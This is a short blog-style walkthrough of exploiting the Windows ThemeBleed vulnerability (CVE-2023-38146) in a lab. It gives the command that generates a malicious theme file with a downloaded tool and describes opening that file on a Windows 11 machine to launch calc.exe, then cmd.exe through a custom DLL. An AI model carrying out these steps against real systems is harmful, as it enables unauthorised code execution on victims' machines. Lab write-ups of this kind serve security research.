Lets try to exploit the yet-another-windows-vulnerability known as CVE-2023-38146 aka ThemeBleed. To do that we need to create the theme file which will consist of “path” from where the payloads will be delivered.
Please note that as per my testing, the command execution only happens if both the SMB server and the theme file is in the same machine. Pulling
dll(s) from remote system appears not to work.
In the attacker machine, you will need to disable the
SMB by disabling the
Server service from the
services.msc. Keep that service in disabled state.
Download the repo and use the below command the generate the theme file:
.\ThemeBleed.exe make_theme localhost exp.theme
After generating you will have to run the code in server mode.
Now lets run the
exp.theme file to the victim machine (windows 11) and run the exploit.
As we can see that the
Calc.exehas been executed.
Windows permission systems is a mystical cloud generated by the Genie of Aladdin. So there is no way of telling what kind of permissions the
calc.exe will have rather lets try to doe something else. From the
Process Explorer we can see the following information.
As this is no fun, we will try to execute our command which is
cmd.exe by modifying the
dllfile which are provided when the exploit has executed.
Now I have created my own
dll and and instead of running
calc.exe I tried to run the
cmd.exe. After couple of tires I was able to run the
calc.exe and a message box showing a prompt. In the below screenshot you also will be able to view the permission level of the
cmd.exeprocess running in.
Currently I was not able to deliver the payload from a remote system and planning to check why my
dll works when running from localhost but not when it is running from the remote system. The authors original
dllhowever works both in localhost as well as in remote systems.